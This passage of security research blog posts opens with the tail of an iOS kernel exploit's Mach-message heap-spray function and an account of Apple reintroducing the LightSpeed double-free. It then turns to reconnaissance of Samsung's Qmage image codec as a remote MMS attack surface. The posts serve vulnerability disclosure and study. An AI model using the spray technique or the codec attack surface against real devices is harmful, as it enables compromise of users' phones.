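    // Bump the queue limit so the port can hold the whole spray at once.
    mach_port_limits_t limits = { .mpl_qlimit = MACH_PORT_QLIMIT_MAX };
    mach_port_set_attributes(mach_task_self(), holder, MACH_PORT_LIMITS_INFO,
                             (mach_port_info_t)&limits,
                             MACH_PORT_LIMITS_INFO_COUNT);

    msg->hdr.msgh_remote_port = holder;
    for (unsigned i = 0; i < count; i++) {
        // Each queued message keeps one kalloc.16 allocation alive.
        mach_msg(&msg->hdr, MACH_SEND_MSG, msg->hdr.msgh_size, 0,
                 MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
    }
    // Destroying "holder" later releases all of the allocations at once.
    return holder;
}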

Patch history

After I had a working POC, I retried the original LightSpeed POC and found that it would eventually panic if left to run for long enough. Thus, this is another case of a reintroduced bug that could have been identified by simple regression tests.

So, let's return to the sources to see if we can figure out what happened. As mentioned earlier, when I first checked the XNU sources to see how the lio_listio() patch might have been broken, I actually couldn't identify how the bug had originally been patched at all. In retrospect, that impression wasn't far from the truth.

The original LightSpeed blog post describes the vulnerability very well, so I won't rehash it all here; I highly recommend reading that post. From a high level, the bug is that the semantics of which function frees the aio_lio_context object are unclear, as both the worker threads that perform the asynchronous I/O and the lio_listio() function itself could do it.

As mentioned in the post, the original fix for this bug was just to not free the aio_lio_context object in the cases in which it might be double-freed:

On the one hand, this patch fixes the potential UaF on the lio_context. But on the other hand, the error case that was handled before the fix is now ignored... As a result it is possible to make lio_listio() allocate an aio_lio_context that will never be freed by the kernel. This gives us a silly DoS that will also crash the recent kernels (iOS 12 included).
[...]
For the rest, we will see in the future if Apple bothers to fix the little DoS they introduced with the patch :D

It turns out that Apple did eventually decide to fix the memory leak in iOS 13... but in doing so it appears they reintroduced the race condition double-free:

    case LIO_NOWAIT:
+       /* If no IOs were issued must free it (rdar://problem/45717887) */
+       if (lio_context->io_issued == 0) {
+           free_context = TRUE;
+       }
        break;

The code in iOS 13 isn't exactly the same as iOS 11, but it's semantically equivalent. Anyone who had remembered and understood the original LightSpeed bug could have easily identified this as a regression by reviewing XNU source diffs. And anyone who ran relatively simple regression tests would have found this issue trivially.

So, to summarize: the LightSpeed bug was fixed in iOS 12 with a patch that didn't address the root cause and instead just turned the race condition double-free into a memory leak. Then, in iOS 13, this memory leak was identified as a bug and "fixed" by reintroducing the original bug, again without addressing the root cause of the issue. And this security regression could have been found trivially by running the original POC from the blog post.

You can read more about this regression in a followup post on the Synacktiv blog.

Conclusion

The combination of the SockPuppet regression in iOS 12.4 and the LightSpeed regression in iOS 13 strongly suggests that Apple did not run effective regression tests on at least these old security bugs (and these were very public bugs that got a lot of attention). Running effective regression tests is a basic requirement of sound software testing, and hunting for regressions of previously public bugs is a common starting point for attackers.

Still, I'm very happy that Apple patched this issue in a timely manner once the exploit became public. The reality here is that attackers figure out these issues very quickly, long before the public POC is released. Thus the window of opportunity to exploit regressions is substantial.

Also, my goal in trying to identify the bug used by unc0ver was to demonstrate that obfuscation does not block attackers from quickly weaponizing the exploited vulnerability. It turned out that I was lucky in my analysis: my experience writing kernel exploits let me quickly figure out an alternative strategy to find the bug, and I happened to already be familiar with the specific vulnerability used because I've been keeping track of past exploits. But anyone in the business of using exploits against Apple users would also have these same advantages.

MMS Exploit Part 1: Introduction to the Samsung Qmage Codec and Remote Attack Surface

16 July 2020 at 16:42
By: Tim
Posted by Mateusz Jurczyk, Project Zero

This post is the first of a multi-part series capturing my journey from discovering a vulnerable little-known Samsung image codec, to completing a remote zero-click MMS attack that worked on the latest Samsung flagship devices. New posts will be published as they are completed and will be linked here.

Introduction

In January 2020, I reported a large volume of crashes in a custom Samsung codec called "Qmage", present in all Samsung phones since late 2014 (Android version 4.4.4+). This codec is written in C/C++ code, and is baked deeply into the Skia graphics library, which is in turn the underlying engine used for nearly all graphics operations in the Android OS. In other words, in addition to the well-known formats such as JPEG and PNG, modern Samsung phones also natively support a proprietary Qmage format, typically denoted by the .qmg file extension. It is automatically enabled for all apps which display images, making it a prime target for remote attacks, as sending pictures is the core functionality of some of the most popular mobile apps.

In May 2020, Samsung released patches addressing the crashes (including a number of buffer overflows and other memory corruption issues) for devices that are eligible for receiving security updates. The issues were collectively assigned CVE-2020-8899 and a Samsung-specific SVE-2020-16747. On the day of the security bulletin being released, I derestricted the relevant #2002 tracker entry, and open-sourced my fuzzing harness on GitHub (SkCodecFuzzer). I recommend reading the original report, as it includes a detailed explanation of the then-current state of the codec, my approach to fuzzing it, and the bugs found as a result. It may provide some valuable context to better understand this and other upcoming blog posts in the series, although I will do my best to make them self-contained and easy to understand on their own.

After reporting the bugs, I spent the next few months trying to build a zero-click MMS exploit for one of the flagship phones: Samsung Galaxy Note 10+ running Android 10. For reference, similar attacks against chat apps were shown to be possible on iPhones via iMessage by Samuel Groß and Natalie Silvanovich of Google Project Zero in 2019 (see demo video, and blog posts #1, #2, #3). On the other hand, to my knowledge, no exploitation attempts of this kind have been publicly documented against Android since the Stagefright vulnerabilities disclosed in 2015. To me, this seemed like a great opportunity to deep dive into the state of the exploit mitigations on Android today, and see how they fared against a relatively powerful bug – a heap-based buffer overflow with controlled buffer size, data length and the data itself. In the end, I managed to develop an exploit which remotely bypassed ASLR and obtained a reverse shell on a victim's phone (with the privileges of the SMS/MMS app) with no user interaction required, in around 100 minutes on average. The official recording of an attack demonstration is available here, and below I am presenting a director's cut of the same video, with a soundtrack added for your viewing pleasure. :)


By publishing this and further blog posts in the Qmage series, I am hoping to shed more light on how I found the codec, what I learned about it during reconnaissance and preparation for fuzzing, and finally how I managed to circumvent various Android mitigations and obstacles along the way to write a reliable MMS exploit. Please join me on this ride!

How it started

As is often the case in vulnerability research (in my experience), there was a bit of luck involved in the finding of this attack surface. In late 2019, Project Zero had a hackathon as part of a team bonding activity, with focus on Samsung phones. We chose Samsung phones as they were the most popular mobile devices in Europe in Q2 2019, when we were planning our event. Other results of that event can also be found in the PZ bug tracker – they were centered mostly around the security of Samsung kernel-mode components, and fixed in February 2020. During the hackathon, we used Samsung Galaxy A50 running Android 9 as our test devices, but the rest of this post is written based on the analysis of a newer Note 10+ and Android 10, which were the latest Samsung flagship devices at the time of this research.

When I was looking for potential bug hunting targets (naturally written in native languages, so that memory corruption issues would apply), my first thought was to look for inspiration in the bug tracker and existing reports from the past. There, the following issues reported by Natalie in 2015 immediately caught my eye:

Samsung Galaxy S6 image processing bugs in Project Zero bug tracker

Memory safety issues in image handling, how splendid! Please note the "Q" in the "libQjpeg" library name in some of the titles – without knowing it, this was my first encounter with the third-party Quramsoft software vendor. I dug into the bug descriptions, but I couldn't find any of the mentioned libSecMMCodec.so, libQjpeg.so or libfacerecognition.so modules on the test device. However, when I searched for some function names extracted from these reports, such as QURAMWINK_DecodeJPEG, I found them in three other files under /system/lib64:

  • libimagecodec.quram.so
  • libatomcore.quram.so
  • libagifencoder.quram.so

If you're wondering how many more libraries with "quram" in their names there are in the directory, there are three more on the Note 10+:

  • libSEF.quram.so
  • libsecjpegquram.so
  • libatomjpeg.quram.so

In general, the various Quram libraries used in a specific Samsung Android build are listed in /system/etc/public.libraries-quram.txt. I think it is worth highlighting that Quramsoft has a portfolio of software solutions related to audio, video, images and animations, both for encoding and decoding. Throughout Android's existence (and even before it), Samsung has worked closely with the third-party vendor and included a number of their libraries in their custom builds of the OS, mostly to support and advance built-in apps such as Camera or Gallery. Over the years, these libraries have been evolving, some of them were renamed and removed, while others were refactored and merged, up to the point where it is objectively hard for a member of the public to keep track which Samsung models have what subset of the libraries installed. However, many of them are still present and are used on the latest phones. I hope this helps clear up any confusion as to why I am referencing Quram libraries outside the context of just the Qmage codec.

Back to the story – after a brief analysis, I narrowed my interest down to the libimagecodec.quram.so library, which was the largest, most imported one, and seemed to implement support for a variety of image formats. I could easily trigger it through Gallery, but I still struggled to reach it through media scanning, something that Natalie used as the attack vector in many of her bugs. I began to investigate how the media scanner worked, starting with platform/frameworks/base/media/java/android/media/MediaScanner.java in AOSP, and specifically the scanSingleFile → doScanFile → processImageFile path. Here, we can see that all it really boils down to is the usage of the standard BitmapFactory interface:

private boolean processImageFile(String path) {
    try {
        mBitmapOptions.outWidth = 0;
        mBitmapOptions.outHeight = 0;
        BitmapFactory.decodeFile(path, mBitmapOptions);
        mWidth = mBitmapOptions.outWidth;
        mHeight = mBitmapOptions.outHeight;
        return mWidth > 0 && mHeight > 0;
    } catch (Throwable th) {
        // ignore;
    }
    return false;
}

I later verified that very similar code was used by the MediaScanner service on my test Samsung device; the only difference being extra references to a com.samsung.android.media.SemExtendedFormat interface and a related libSEF.quram.so library, which appeared irrelevant to my goal of triggering Quram's custom JPEG decoder.

Discovering Skia and Qmage

Not being very familiar with Android and its graphics subsystem at the time, I wanted to dig even deeper into the stack of abstraction and see the actual image decoding code. To achieve that, I followed the execution path of a few more nested methods, first in Java and then crossing into C++ land: BitmapFactory.decodeFile → decodeStream → decodeStreamInternal → nativeDecodeStream → doDecode. In here, we can finally see the actual logic of decoding an image from a byte stream, first by creating a Skia SkCodec object:

    // Create the codec.
    NinePatchPeeker peeker;
    std::unique_ptr<SkAndroidCodec> codec;
    {
        SkCodec::Result result;
        std::unique_ptr<SkCodec> c = SkCodec::MakeFromStream(std::move(stream), &result, &peeker);

        [...]

        codec = SkAndroidCodec::MakeFromCodec(std::move(c));
        if (!codec) {
            return nullObjectReturn("SkAndroidCodec::MakeFromCodec returned null");
        }

… and then calling the getAndroidPixels method on it:

    SkCodec::Result result = codec->getAndroidPixels(decodeInfo, decodingBitmap.getPixels(),
            decodingBitmap.rowBytes(), &codecOptions);

So, in order to learn what image formats are supported by the interface, we have to look into SkCodec::MakeFromStream. The upstream version of the method can be found on GitHub; there, we can see that depending on macros defined during compilation, the following types of images can be loaded (based mostly on the gDecoderProcs table):

  • png
  • jpeg
  • webp
  • gif
  • ico
  • bmp
  • wbmp
  • heif
  • raw (dng)

This is already a sizable list of formats. We can compare the open-source implementation with the compiled one found on Samsung phones in /system/lib64/libhwui.so, which is where the Skia code lives on Android now (on older systems, it was located in /system/lib64/libskia.so). When I originally opened the SkCodec::MakeFromStream method in IDA Pro, I saw an unrolled loop iterating over the standard Skia codecs, but also a few extra file signature checks, namely:

if ( png_sig_cmp(header, 0LL, length) && (!length || *(_DWORD *)header != 'OIP\x89') )
{
  if ( header[0] == 'Q' && header[1] == 'G' )
  {
    if ( QuramQmageDecVersionCheck(header) )
    {
      // ...
    }
    __android_log_print(6LL, "Qmage", "%s : stream is not a Qmage file\n", "IsQmg");
  }
  if ( header[0] == 'Q' && header[1] == 'M' )
  {
    if ( QuramQmageDecVersionCheck_Rev8253_140615(header) )
    {
      // ...
    }
    __android_log_print(6LL, "Qmage", "%s : stream_Rev8253_140615 is not a Qmage file\n", "IsQM");
  }
  else if ( *(_DWORD *)header == 0x5CA1AB13 )
  {
    // ...
  }

There were four additional signatures being checked for:

  1. \x89PIO, an alternative to the standard \x89PNG file magic.
  2. QG, a type of a Qmage file, as indicated by the log string.
  3. QM, another type of a Qmage file.
  4. \x13\xAB\xA1\x5C, magic bytes which represent an Adaptive Scalable Texture Compression (ASTC) image.

After brief analysis, I concluded that PIO and ASTC were not particularly interesting from a security research perspective, and I turned my eyes to Qmage. It looked like the obvious choice, considering that libhwui.so had hundreds of functions containing "quram", "qmage", or other related strings, these routines performed low-level file format parsing, and many of them were extremely long. The codec seemed so complex and so deeply integrated in Android that it got me really intrigued. An additional factor in all this was that I had never heard about it before, and even using Google search wasn't of much help either. In offensive security, this is usually a very strong indicator of an attractive research target, so I had no choice – I had to put my detective cap on and investigate further.

Learning more about the codec

At this stage, I had many questions roaming in my head, and hardly any answers:

  • What is this codec? How does it work?
  • What is the history behind it? How long has it been shipping? Is it present in all Samsung phones?
  • What is its intended use, and where to find samples to start playing with?
  • What is the security posture of the code?

Finding the answers took me many weeks, but for the sake of brevity, I will present an accelerated account of the events, which skips over some periods of confusion and attempts to make sense of the partial information available at the time. :)

Format versioning

So far, we know that there are two possible magic values for Qmage files: QM and QG. If we look deeper into QuramQmageDecVersionCheck → QmageDecCommon_VersionCheck, which is the second part of the header check, we will see the following logic (in C-like pseudocode):

int QmageDecCommon_VersionCheck(unsigned __int8 *data) {

  if ((data[0] | (data[1] << 8)) != 'GQ') {
    debug_QmageDecError = -5;
    return 0;
  }

  if (data[2] > 2 || (data[2] == 2 && data[3] != 0)) {
    debug_QmageDecError = -5;
    return 0;
  }

  return 1;
}

The function verifies the QG signature again, and then treats the next two bytes as the version identifier. If we assume that data[2] and data[3] are major and minor version numbers respectively, then according to the code above, all versions up to and including 2.0 are supported. In fact, this is a really permissive way of implementing the check, because it allows through a number of versions that don't really exist. At the time of this writing, I already know that there are three actual valid versions of the QG format:

  • QG 1.0
  • QG 1.1
  • QG 2.0

Other combinations of major/minor versions (such as 1.231) are either ignored by the codec, or resolve to one of the three above.

To learn more about the versioning of QM images, we can similarly follow the QuramQmageDecVersionCheck_Rev8253_140615 → QmageDecCommon_VersionCheck_Rev8253_140615 functions in our disassembler, which will lead us to the following logic:

int QmageDecCommon_VersionCheck_Rev8253_140615(unsigned __int8 *data) {

  if (*(unsigned short *)&data[0] == 'MI') {
    if ( data[7] - 90 < 4 )
      return 1;
  }
  else if (*(unsigned short *)&data[0] == 'TI' ) {
    if ((data[5] & 0x7F) == 21)
      return 1;
  }
  else if (*(unsigned int *)&data[0] == 'GEFI') {
    if ((data[11] & 0x7F) == 21)
      return 1;
  }
  else if (*(unsigned short *)&data[0] == 'WQ') {
    if (data[2] > 0xC)
      return 1;
  }
  else if (*(unsigned int *)&data[0] == '`RFP') {
    if (*(unsigned int*)&data[4] == 0)
      return 1;
  }
  else if (*(unsigned short *)&data[0] == 'MQ' && data[2] == 1) {
    return 1;
  }

  debug_QmageDecError = -5;
  return 0;
}

This is definitely more code than expected. We are primarily interested in the last if statement, where we can see that a 0x01 byte is expected to follow the QM magic. Again assuming that this is the version number, we can note down that version 1 of the QM format is supported by the modern Samsung build of Skia. However, there are also a number of other signatures being checked for: IM, IT, IFEG, QW and PFR. I don't know exactly what formats they represent, and since the above routine can only be reached through a QM header detected in SkCodec::MakeFromStream, the signatures don't really seem to be intentional there. More likely, they are leftover artifacts of file formats parsed by Quramsoft code elsewhere, or of formats that have since been deprecated and are no longer in active use. We might see these constants again in the future, so it's worth keeping them in mind.

In summary, there are four distinct versions of Qmage supported by Skia, in chronological order: QMv1, QG1.0, QG1.1, QG2.0. This is especially self-evident when looking at the list of debug symbols found in libhwui.so. For each symbol that has existed in the QMv1 codec all the way to QG2.0, there are now four copies of the given variable/function/etc., for example:

Example list of Qmage functions with four copies each

The names without any suffixes represent parts of the code for the latest format (QG 2.0). For each earlier format, there seems to be a fork of the code with all functions, structures, static objects etc. renamed to include a revision number and a second numeric part which looks like a date. If my understanding is correct, that would mean that the cut-off dates for the QMv1, QG1.0 and QG1.1 versions of the format were around June 2014, Oct 2014 and Feb 2015 – a relatively short period of time. The QG2.0 iteration was first seen in January 2020 in Android 10, but being the most recent, it lacks the convenient _RevXXXX_YYMMDD suffix to tell us exactly which revision number it is.

However, there are also other bits and pieces of information regarding the versioning of the codec itself to be found in the precompiled Skia binaries. For example, there is an empty function called QmageDecCommon_QmageVersion_1_11_00 in the current build of libhwui.so. Furthermore, there is also an unused QuramQmageGetDecoderVersion function in the library, which prints out some other kind of four-part version number, and the exact build date and time, for example:

void QuramQmageGetDecoderVersion() {
  __android_log_print(ANDROID_LOG_INFO, "QG", "Quram Qmage Decoder Info\n");
  __android_log_print(ANDROID_LOG_INFO, "QG", "Version\t : %d.%d.%d.%d\n", 2, 0, 4, 21541);
  __android_log_print(ANDROID_LOG_INFO, "QG", "Build Date\t : %s %s\n", "Mar 17 2020", "19:18:14");
}

If the version number is represented by four X.Y.Z.R integers, then the X.Y pair denotes the highest version of the QG format that the codec supports (in this case, QG2.0), and R is the revision number of the code. By studying the countless builds of libskia.so and libhwui.so found in archival Samsung firmwares released over the years, one could create a very accurate record of all the different Qmage compilations ever shipped with Samsung devices. My limited analysis has resulted in the following, undoubtedly incomplete table:

Build Date     Build Time    X    Y    Z    R
Jun 15 2014    (QMv1 codec)                 8253
Nov 14 2014    20:12:03      1    0    0    10484
Nov 17 2014    16:25:19      1    0    0    10484
Jun 12 2015    19:23:03      1    1    1    14470
Jul 3 2015     20:40:49      1    1    1    14470
Jul 6 2015     11:52:27      1    1    1    14470
Sep 2 2015     16:27:42      1    1    1    14470
Nov 27 2015    20:39:10      1    1    1    14470
Dec 21 2015    18:29:31      1    1    2    14470
May 27 2016    15:57:00      1    1    4    21541
Sep 8 2016     17:42:29      1    1    4    21541
Nov 8 2017     20:52:16      1    1    4    21541
Jan 11 2018    20:31:15      1    1    4    21541
Sep 26 2019    17:06:36      2    0    4    21541
Feb 28 2020    09:26:32      2    0    4    21541
Mar 17 2020    19:18:14      2    0    4    21541
May 28 2020    08:53:20      2    0    4    21541

Based on the above information, we can confirm some of our existing presumptions, and draw new conclusions:

  • The codec's appearance in Skia goes back to around mid-2014.
  • It saw the most activity in development between 2014 and 2016, followed by a few years of relative inactivity, to come back again with a new version 2.0 of the format, first compiled for production use in September 2019.
  • The Z component of the version (4) and the revision number (21541) haven't changed since 2016, limiting our insight into the volume of recent changes in the code base.

For those like me who are interested in small interesting pieces of metadata, there are even more artifacts to be found in the library. For example, there are three copies of the QuramQmageGetDecoderVersion function in libhwui.so on Samsung Android 10 (for each version of the QG format), and there are both 32-bit and 64-bit builds of the shared object in the system, so for one compilation of the Qmage codecs, we get six different timestamps taken during the process. On the example of the build from 26 September 2019:

Version    Bitness    Build timestamp
2.0        32-bit     17:05:08
1.1        32-bit     17:06:16
1.0        32-bit     17:06:17
2.0        64-bit     17:06:36
1.1        64-bit     17:07:45
1.0        64-bit     17:07:46

I don't think there is any information that can be derived from it with full certainty, but I still find it fascinating enough to include here. At the very least, the 2m38s gap between the first and last timestamp gives us a clue as to the extent of complexity of the codec.

Codec size, basic control flow and compression types

When we open up libhwui.so in IDA Pro and start inspecting the Qmage code in compiled form, the above build times may start to make sense. In the few builds of the library that I've tested, the Qmage-related code is placed in one continuous binary blob, which makes it easy to measure its size. For example, in the 26-Sep-2019 build (2.0.4.21541), the first function in the Qmage-related chunk is QmageDecoderLicenseCheck, and the last one is SetResidualCoeffs_C. The overall code region between them is almost 908 kB in size (!), or around 15% of the overall executable segment in the shared object. In large part, this is due to the QG2.0 codec added in Android 10, which introduces more code duplication (new forks of most Qmage-related functions) and imports a whole new copy of libwebp. But even on Android 9 and the 8-Nov-2017 build, the codec is ~425 kB long.

Below is a list of the 20 longest functions found in libhwui.so. Notice how 18/20 of them are related to Qmage:

Top 20 longest functions in libhwui.so

Let's now move onto the control flow and entry points of the codec. When a Qmage image is loaded through an Android interface such as BitmapFactory, execution ends up in the doDecode function, which then calls SkCodec::MakeFromStream, as discussed above. Then, if the first few bytes match the "QG" signature, execution reaches SkQmgCodec::MakeFromStream and further nested functions for header parsing:

SkQmgCodec::MakeFromStream
└── ParseHeader
    └── QuramQmageDecParseHeader
        ├── QmageDecCommon_ParseHeader
        │   └── QmageDecCommon_QGetDecoderInfo
        └── QmageDecCommon_MakeColorTableExtendIndex

The flow is very similar for the older QMv1 files. This basic parsing is sufficient to extract essential information about the bitmap such as its dimensions, so if the inJustDecodeBounds flag is set in BitmapFactory.Options, the processing of the file ends here. However, even though the header parsing logic is short and simple compared to the full bitmap decoding, I still managed to find memory corruption issues there related to building the color table in memory. So, even processes that only query the bounds of untrusted images, such as the MediaScanner service, were prone to attacks via Qmage. But let's not get ahead of ourselves. If the full bitmap data is requested by the caller (e.g. for an app to display it), execution proceeds to SkQmgCodec::onGetPixels and deeper down:

SkQmgCodec::onGetPixels
└── QuramQmageDecodeFrame
    └── Qmage_WDecodeFrame_Low
        └── _QM_WCodec_decode
            ├── PVcodecDecoderIndex
            ├── PVcodecDecoderGrayScale
            └── PVcodecDecoder

Up until this point, the consecutive functions are mostly simple wrappers over the next nested routines, without much data processing logic involved. This changes with the PVcodecDecoder[...] family, which finally chooses the relevant low-level codec and calls one of the corresponding long, complex functions which do the heavy lifting, such as PVcodecDecoder_1channel_32bits_NEW or QuramQumageDecoder32bit24bit. The subset of available compression types varies between different versions of Qmage; I have performed a cursory analysis and documented them below. Some of them implement well-known concepts such as Run-Length Encoding (RLE) or zlib inflation, while others (the most complex ones) seem to execute custom, proprietary decompression algorithms.


Low-level decoder functions available across the QMv1, QG1.0, QG1.1 and QG2.0 codecs:

  • PVcodecDecoder_1channel_16bits_NEW
  • PVcodecDecoder_1channel_32bits_NEW
  • PVcodecDecoder_GrayScale_16bits_NEW
  • PVcodecDecoder_zip
  • QmageDiffZipDecode
  • PVcodecDecoder_24bits_NEW
  • PVcodecDecoder_32bits_NEW
  • QuramQumageDecoder32bit24bit
  • QmageRunLengthDecodeCheckBuffer
  • QuramQumageDecoder8bit
  • QuramQmageGrayIndexRleDecode

It's worth noting that even as some of these compression types are no longer found in the most recent version of the codec, they are still present and reachable through the older versions supported on Samsung devices. A minor exception is the QMv1 format, which sometimes fails to load in Skia in certain contexts, probably due to its obsolescence and lack of proper testing on modern devices.

It's also interesting that at this level of abstraction, the QG2.0 format doesn't introduce any new codecs of its own. That doesn't mean that it's only a minor revision compared to QG1.1 – on the contrary, it does bring in a vast amount of new functions, just at a different level of the call hierarchy:

[...]
├── QuramQumageDecoder32bit24bit
│   ├── DecodePrediction2dZip
│   ├── DecodePrediction2dZip_1L
│   └── QmageDecodeStreamGet_GMH
├── QmageDiffZipDecode
│   └── QmageSubUnCompress
│       └── qme_uncompress
│           ├── qme_inflateInit
│           ├── qme_inflate
│           └── qme_inflateEnd
└── PVcodecDecoder_zip
    ├── Qmage7zUnCompress
    ├── QmageBinUnCompress
    └── Vp8XxD_QMG
        ├── VP8LNew_QMG
        ├── WebPResetDecParams_QMG
        ├── VP8InitIoInternal_QMG
        ├── VP8LDecodeHeader_QMG
        └── XxDecodeImageData__QMG

Instead of adding new compression types, the QG2.0 format seems to build on and improve the existing ones. It also imports the zlib 1.2.8 library, with each of its functions prepended with the qme_ prefix, and a whole second copy of libwebp (one is already used by Skia), with all of its symbols appended with a _QMG suffix. One could presume that the addition of libwebp indicates some kind of webp-in-qmage "inception" feature, but based on the fact that a great majority of the library is never referenced, it's more likely that Qmage simply borrows a few functions from libwebp, but just happens to link in the whole library. It was one of many unorthodox development practices that had been apparent in the codec so far.

I hope this sheds some light on the structure of the code and the versioning of .qmg files. With some basic knowledge of the inner workings of the format, we can now look for some actual examples of such images to play and experiment with.

Finding input samples

Based on the available information, we can presume that the Qmage format was not introduced in Skia for user-generated content, but rather for static resources in Samsung-manufactured APKs (built-in apps and themes). This is where we can look for an initial set of test cases for fuzzing and manual experimentation. However, please note that throughout the years, APK resources in Samsung firmwares have shipped in a variety of formats and file extensions:

  • Qmage (.qmg, .qio)
  • ASTC (.astc, .atc)
  • PNG (.png, .pio)
  • BMP (.bmp)
  • JPEG (.jpeg)
  • SVG (.svg)
  • webp (.webp)
  • SPR (.spr)
  • Binary XML (.xml)

It is not clear to me how the device model, Android version, year of release, country code or other characteristics of a specific Samsung firmware factor into the determination of which format to use for a given resource in a given app. Sometimes all bitmaps were encoded in a single format (e.g. PNG, Qmage, ASTC), and in other cases up to six different formats were used in the scope of one APK. This is still largely a mystery to me. However, I can say for sure that I have had the most luck finding .qmg files in the firmware of Android 4.4.4, 5.0.1, 5.1.1 and 6.0.1 for Samsung Galaxy Note 3, 4 and 5 released in 2014-2016. That said, please note that this is just an example and a variety of other firmwares also include Qmage samples.

As mentioned in the bug tracker entry, I have been able to identify legitimate QMv1, QG1.0 and QG1.1 samples during my research. While the codec for QG2.0 is present in Skia on Android 10, I haven't encountered any genuine bitmaps encoded in this new format thus far, despite spending a little bit of time looking for them. Consequently, in order to achieve a satisfying degree of code coverage of the QG2.0 codec, I had to synthesize such files through the fuzzing of existing QG1.x test cases that I had at my disposal. I'll go into this in more detail in the next blog post.

To obtain some actual files to look at, let's examine the firmware of Samsung Galaxy Note 4, Android 6.0.1, for Switzerland, built on 3 May 2016 (fun fact: about half of Project Zero is based in Switzerland). Once we have access to the system partition, we can dig into the default apps stored in /system/app and /system/priv-app. My go-to app to look for Qmage samples is /system/priv-app/SecSettings/SecSettings.apk. An APK is essentially a ZIP archive, so we can extract it, open it in our favorite file manager and browse to the res/ subdirectory. In there, we'll see:

Structure of the "res" APK directory

We are interested in the drawable subdirectories, for example drawable-xxxhdpi-v4:

Bitmap resources found in the "drawable-xxxhdpi-v4" subdirectory

There they are, actual embedded Qmage files! They are noticeably mixed with some .pio (png) images, as well as a few other formats (webp, xml, jpeg, spr) not shown in the screenshot. Let's take the accessibility_light_easy_off.qmg file out for testing. In a hex editor, we can see that it's in fact a QG1.1 file (see first four bytes):

Hex dump of an example Qmage file header

The basic header of Qmage files is 12 bytes long and has the following structure:

Magic      Version           Flags   Qual.   Width       Height      Extra
'Q' 'G'    0x01 0x01 0x01    0x28    0x5B    0x58 0x01   0x58 0x01   0x00

Interpreted as:
QG         1.1.1             0x28    91      344         344         0
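For convenience, the same 12-byte layout can also be expressed as a small C struct. Note that the field names below are my own invention (Quram's original names are unknown to me), and the multi-byte fields are little-endian:

// The 12-byte QG header as laid out above. Field names are mine, not Quram's.
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#pragma pack(push, 1)
typedef struct {
    char     magic[2];     // 'Q', 'G'
    uint8_t  version[3];   // e.g. 01 01 01 -> "1.1.1"
    uint8_t  flags;        // e.g. 0x28
    uint8_t  quality;      // 0-100, e.g. 0x5B == 91
    uint16_t width;        // little-endian, e.g. 0x0158 == 344
    uint16_t height;       // little-endian, e.g. 0x0158 == 344
    uint8_t  extra;
} qg_header;
#pragma pack(pop)

static void dump_qg_header(const uint8_t *buf) {
    qg_header h;
    memcpy(&h, buf, sizeof(h));
    printf("QG %u.%u.%u, flags=0x%02x, quality=%u, %ux%u, extra=%u\n",
           h.version[0], h.version[1], h.version[2],
           h.flags, h.quality, h.width, h.height, h.extra);
}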

So in this example, we are dealing with a lossy (quality 91/100) bitmap with 344x344 dimensions. Let's try to get it loaded on a real device to see if it's displayed correctly. To achieve that, it is important to give the file a standard image extension such as .png or .jpg, since .qmg files are not recognized as images by default. Once we change the extension and copy the file to a Samsung phone, we can view it in Gallery or any other app which displays bitmaps:

Qmage file displayed in the Gallery app

It works! What happens if we send the Qmage image via MMS?

Qmage file sent over MMS and displayed by the Messages app

Success again. This confirms that Qmage files are indeed seamlessly supported on Samsung devices the same way other standard formats are, which makes them an equally important attack surface. We can now fire up a debugger, attach it, for example, to the Gallery process (com.sec.android.gallery3d), set a breakpoint on one of the codec entry points and follow the execution flow to better understand how it works. We can also start manually flipping bits to see how resistant the codec is against corrupted input, or collect the samples in preparation for an automated fuzzing session. With a number of valid Qmage-encoded files to play with, our testing capabilities are suddenly greatly extended. Before we get to that, though, let's see if we can find any more debug symbols or other publicly available metadata, which might prove useful in future bug root cause analysis or exploit development.

Finding traces of open-source code

In the early stages of exploring old or obscure technologies, I like to refer to GitHub as a source of information. It can help identify open-source code related to the subject in question, otherwise not indexed by web search engines and hard to find by the usual means. This worked well here as well – when I typed "qmage" into the search box, I got a number of interesting hits. Perhaps the most helpful one revealed that Samsung used to open-source its custom Skia modifications, including a wrapper class for Qmage. To access it through the official channels, you can go to https://opensource.samsung.com/, navigate to RELEASE CENTER → Mobile, and look for packages with names containing "_LL_", and with over 1.0 GB in size (for example GT-I9505_EUR_LL_Opensource.zip). The two letters most likely signify the Android version, i.e. LL for Android Lollipop (version 5.x).

Code snippet of the SkQmageImageDecoder::onDecode method

The relevant file in the bundle is Platform.tar.gz/vendor/samsung/packages/apps/SBrowser/src/platform/kk/external/skia/src/images/SkImageDecoder_libqmage.cpp. I suspect that the "kk" subdirectory name relates to Android KitKat (version 4.4.4), whose release time frame coincides with the period when Qmage in Skia was first spotted in Samsung firmware (around June 2014). The code itself doesn't contain too much detail about the internals of the codec, as it delegates the actual parsing work to the QuramQmageDecParseHeader and QuramQmageDecodeFrame functions mentioned before. On the other hand, it gave me some psychological comfort and motivation to look for further clues and information – perhaps I wouldn't have to be limited to just ARM assembly and reverse-engineered structure layouts with made up field names, after all.

More Qmage versions, parsers, and symbols – QMG boot animations

I will try to keep the section as brief as possible, even though it could easily fill a whole blog post on its own. The history of the Qmage format in Samsung devices is in fact much longer than the time span between 2014 and 2020 – before being incorporated in Skia, it had been used as the container format for boot and shutdown animations since early versions of Samsung Android, and theme resources in the pre-Android era. If you browse some mobile phone-related forums such as XDA Developers or oldph.one, you will find a number of references to "Qmage" and "qmg" in those contexts. You can also check for yourself, by looking for .qmg files on the file system of a modern Samsung phone. On my Note 10+, I can find the following three:

  • /system/media/bootsamsungloop.qmg
  • /system/media/bootsamsung.qmg
  • /system/media/shutdown.qmg

Since these files represent animations and not static bitmaps, they are encoded differently than the Qmage samples we have seen so far. Let's have a look at their headers:

d2s:/ $ for file in /system/media/*.qmg; do xxd -g 1 -l 16 $file; done
00000000: 51 4d 0f 00 80 00 a0 05 e0 0b 00 20 7b 50 00 00  QM......... {P..
00000000: 51 4d 0f 00 80 00 a0 05 e0 0b 00 20 7b 50 00 00  QM......... {P..
00000000: 51 4d 0f 00 80 00 a0 05 e0 0b 00 20 83 50 00 00  QM......... .P..
d2s:/ $

They are stored in the old, familiar "QM" format, but with the version byte set to 0x0F instead of 0x01. Based on my research, I have concluded that QM animations have been assigned versions starting with 0x0B (11) up to 0x0F (15), which is currently the most recent one. The exact logic behind this versioning system is unknown; one unconfirmed hypothesis is that QM animation versions are expressed as X+10 where X is the corresponding static format version. Importantly, the animated images don't seem to be compatible with the static ones, so they cannot be easily used as input test cases for Skia.

